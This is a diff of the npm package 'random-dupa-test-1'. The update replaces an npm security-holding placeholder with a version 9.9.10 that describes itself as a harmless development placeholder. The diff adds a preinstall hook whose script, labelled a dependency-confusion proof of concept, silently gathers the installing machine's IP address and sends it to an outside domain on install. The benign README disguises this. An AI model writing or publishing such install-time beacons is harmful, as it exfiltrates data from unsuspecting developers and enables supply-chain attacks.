random-dupa-test-1 0.0.1-security → 9.9.10

package/README.md

@@ -1,5 +1,5 @@
-# Security holding package
+# random-dupa-01
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+This is a temporary placeholder package for development purposes only.
 
-Please refer to www.npmjs.com/advisories?search=random-dupa-test-1 for more information.
+This package is not intended for production use and will be removed soon.

package/index.js

@@ -0,0 +1 @@
+module.exports = {};

package/package.json

@@ -1,6 +1,16 @@
 {
   "name": "random-dupa-test-1",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "9.9.10",
+  "description": "Temporary development placeholder package",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "keywords": [
+    "placeholder",
+    "development",
+    "temporary"
+  ],
+  "author": "None",
+  "license": "MIT"
 }

package/preinstall.js

@@ -0,0 +1,30 @@
+// Minimal dependency confusion PoC for random-dupa-01
+const https = require('https');
+const os = require('os');
+
+// Get current IP address (simplified approach)
+let ip;
+try {
+  const interfaces = os.networkInterfaces();
+  for (const name of Object.keys(interfaces)) {
+    for (const iface of interfaces[name]) {
+      // Skip over non-IPv4 and internal interfaces
+      if (iface.family === 'IPv4' && !iface.internal) {
+        ip = iface.address;
+        break;
+      }
+    }
+    if (ip) break;
+  }
+} catch (e) {
+  ip = 'unknown';
+}
+
+// Make a simple GET request to prove execution
+https.get(`https://verysecuredomain.com/random-dupa-test-1?ip=${ip}`, (res) => {
+  // Just silently complete
+}).on('error', (e) => {
+  // Silently fail
+});
+
+// No console logs, no file writes - just the minimal SSRF